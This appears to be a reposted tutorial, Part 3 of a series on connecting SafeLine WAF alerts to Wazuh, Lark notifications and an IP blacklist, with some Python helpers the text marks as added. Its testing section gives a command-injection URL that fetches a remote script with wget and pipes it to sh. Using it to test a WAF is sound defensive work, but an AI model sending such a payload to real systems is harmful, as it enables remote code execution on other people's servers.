

🔧 Integrating Open Source WAF with Wazuh (Part 3)


News section: 🔧 Programming
🔗 Source: dev.to

This article is written by a SafeLine WAF user, 曼联小胖子

Part 1 is here.
Part 2 is here.

Wazuh Agent Configuration

  1. Log in to the SafeLine WAF server and configure ossec to monitor the waf_alert.log file:
vim /var/ossec/etc/ossec.conf

Add the following configuration:

<localfile>
    <log_format>syslog</log_format>
    <location>/var/log/waf_alert/waf_alert.log</location>
</localfile>

It should be like the image below.

[image: the resulting <localfile> entry in ossec.conf]

  2. Restart the Wazuh agent to apply the configuration:
systemctl restart wazuh-agent
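The two steps above edit ossec.conf by hand. As an added example (not from the article), the helper below makes the same change idempotently, so re-running a provisioning script never duplicates the <localfile> block, and lists the locations the agent will collect; `ensure_localfile`, `monitored_locations` and the sample config are my own names and a constructed file, not part of SafeLine or Wazuh.

```python
import re

# Constructed ossec.conf fragment for the demo; a real file is larger and may
# contain several <ossec_config> roots (the block is appended to the last one).
SAMPLE_OSSEC_CONF = """<ossec_config>
  <client>
    <server><address>10.0.0.5</address></server>
  </client>
  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/auth.log</location>
  </localfile>
</ossec_config>
"""

WAF_ALERT_LOG = "/var/log/waf_alert/waf_alert.log"

# One <localfile> block and the <location> it declares (non-greedy, multi-line).
LOCALFILE_RE = re.compile(
    r"<localfile>.*?<location>\s*(.*?)\s*</location>.*?</localfile>", re.S)


def monitored_locations(conf_text: str) -> list[str]:
    """Return every <location> declared inside a <localfile> block."""
    return LOCALFILE_RE.findall(conf_text)


def ensure_localfile(conf_text: str, location: str, log_format: str = "syslog") -> str:
    """Return conf_text with a <localfile> entry for `location` present exactly once.

    The block is inserted before the last </ossec_config> so it stays inside
    the agent configuration; calling this again for the same path is a no-op.
    """
    if location in monitored_locations(conf_text):
        return conf_text
    block = (
        "  <localfile>\n"
        f"    <log_format>{log_format}</log_format>\n"
        f"    <location>{location}</location>\n"
        "  </localfile>\n"
    )
    idx = conf_text.rfind("</ossec_config>")
    if idx == -1:
        raise ValueError("no <ossec_config> root found")
    return conf_text[:idx] + block + conf_text[idx:]


if __name__ == "__main__":
    # In production: read /var/ossec/etc/ossec.conf, write the result back,
    # then restart wazuh-agent as in step 2.
    updated = ensure_localfile(SAMPLE_OSSEC_CONF, WAF_ALERT_LOG)
    print(updated)
    print(monitored_locations(updated))
```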

Testing the Setup

Run a vulnerability scan against the site, or submit a test attack request, to trigger an alert and check that the request is intercepted. For example:

https://a.test.com/view.php?doc=11.jpg&format=swf&isSplit=true&page=||wget http://spotslfy.com/wget.sh -O-|sh

Lark Alert Card

The Lark alert card will display clear messages that all relevant personnel in the group can see.

[image: Lark alert card]

Safeline WAF IP Blacklist

You can see the attacking source IP, such as 47.1.1.1, automatically added to the blacklist.

[image: source IP 47.1.1.1 in the SafeLine blacklist]

When the attacker tries to access the website again, they will be blocked.

[image: blocked request from the blacklisted IP]

Checking the Number of Blacklisted IPs

To count the total number of blacklisted IPs, check the log:

cat /var/log/waf/block_ip.log

[image: contents of block_ip.log]
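Reading block_ip.log with cat shows one line per block event, so the line count overstates the number of distinct IPs. As an added example (not from the article), the script below counts distinct blacklisted addresses, tallies repeat bans, and flags any private or otherwise non-global address, which usually means the WAF saw a proxy or load balancer address instead of the real client. The article does not show the log format, so the sample lines and the `ip=` field regex are constructed assumptions; adjust `IP_RE` to match your file.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample of /var/log/waf/block_ip.log (format assumed, not SafeLine's).
SAMPLE_BLOCK_LOG = """\
2024-06-01 10:15:02 block ip=47.1.1.1 reason=wazuh-active-response
2024-06-01 10:15:40 block ip=47.1.1.1 reason=wazuh-active-response
2024-06-01 11:02:11 block ip=47.2.2.2 reason=wazuh-active-response
2024-06-01 11:30:00 block ip=10.0.0.8 reason=wazuh-active-response
2024-06-01 12:00:00 block ip=not-an-ip reason=wazuh-active-response
"""

IP_RE = re.compile(r"ip=(\S+)")  # assumption about the log layout


def blacklist_summary(log_text: str) -> dict:
    """Count distinct blacklisted IPs and flag entries that deserve review.

    Returns the unique count, per-IP hit counts, addresses that are private
    or otherwise non-global (likely a proxy or internal host was banned),
    and lines whose IP field did not parse.
    """
    hits = Counter()
    non_global = set()
    unparsable = []
    for line in log_text.splitlines():
        m = IP_RE.search(line)
        if not m:
            continue
        try:
            addr = ipaddress.ip_address(m.group(1))
        except ValueError:
            unparsable.append(line)
            continue
        hits[str(addr)] += 1
        if not addr.is_global:
            non_global.add(str(addr))
    return {
        "unique": len(hits),
        "hits": dict(hits),
        "non_global": sorted(non_global),
        "unparsable": unparsable,
    }


if __name__ == "__main__":
    # In production: blacklist_summary(open("/var/log/waf/block_ip.log").read())
    print(blacklist_summary(SAMPLE_BLOCK_LOG))
```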

Further Ideas

Due to limited personal resources, there are two additional ideas regarding Lark alerts that I haven’t implemented. If you’re interested and have the development skills, feel free to explore further:

  1. Avoiding False IP Bans: To avoid mistakenly banning IPs, you could add two interactive buttons to the Feishu card message: “Confirm IP Ban” and “Ignore.” Clicking “Confirm IP Ban” would trigger the IP ban and simultaneously send a notification to the group with the handling result.

  2. Alert Data Analysis: Currently, alert information pushed to the Feishu group cannot be statistically analyzed. Feishu multi-dimensional tables have basic Excel capabilities and powerful automation processes. With well-designed table fields, automation configurations, and API development, it can serve as a low-cost security data center and SOAR. For example, it could periodically push security weekly reports to the Feishu security workgroup, periodically summarize malicious IP lists, and push them to security devices.
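As an added sketch of the first idea (not from the article, which leaves it unimplemented), the code below builds the card with the two buttons and applies the decision exactly once when a button is clicked, refusing to ban non-global addresses so a proxy is not blacklisted by mistake. The card JSON follows the Lark interactive-card schema as I recall it, so check the field names against the Lark docs; button callbacks require a Lark app with a card-action callback URL rather than a plain custom-bot webhook, and `BanApprover`, `build_confirm_card` and the `ban_ip` hook are my own names.

```python
import ipaddress
from typing import Callable

# Assumptions: card layout per the Lark interactive-card schema (msg_type
# "interactive", elements of tag "div" and "action"); on click Lark echoes the
# button's `value` dict back in the callback's action.value. `ban_ip` stands
# for whatever Part 2 used to add an address to the SafeLine blacklist.


def build_confirm_card(alert_id: str, ip: str, detail: str) -> dict:
    """Card with two buttons; each button's `value` is echoed back on click."""
    def button(label: str, action: str, style: str) -> dict:
        return {"tag": "button", "type": style,
                "text": {"tag": "plain_text", "content": label},
                "value": {"alert_id": alert_id, "ip": ip, "action": action}}
    return {"msg_type": "interactive", "card": {
        "header": {"title": {"tag": "plain_text",
                             "content": f"WAF alert {alert_id}: {ip}"}},
        "elements": [
            {"tag": "div", "text": {"tag": "lark_md", "content": detail}},
            {"tag": "action", "actions": [button("Confirm IP Ban", "ban", "danger"),
                                          button("Ignore", "ignore", "default")]},
        ]}}


class BanApprover:
    """Keeps alerts waiting for a human decision and applies it exactly once."""

    def __init__(self, ban_ip: Callable[[str], None]):
        self.ban_ip = ban_ip               # e.g. a call to the SafeLine blacklist API
        self.pending: dict[str, str] = {}  # alert_id -> source IP

    def propose(self, alert_id: str, ip: str, detail: str) -> dict:
        """Register the alert and return the card to post to the group."""
        self.pending[alert_id] = ip
        return build_confirm_card(alert_id, ip, detail)

    def handle_click(self, value: dict) -> str:
        """Handle the action.value from a card callback; returns the group notice."""
        alert_id, ip, action = value["alert_id"], value["ip"], value["action"]
        if self.pending.pop(alert_id, None) != ip:
            return f"alert {alert_id} already handled or unknown"
        if action != "ban":
            return f"alert {alert_id} for {ip} ignored"
        if not ipaddress.ip_address(ip).is_global:  # do not ban a proxy or internal host
            return f"refused to ban non-global address {ip}"
        self.ban_ip(ip)
        return f"{ip} added to the WAF blacklist"
```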

That's the end.
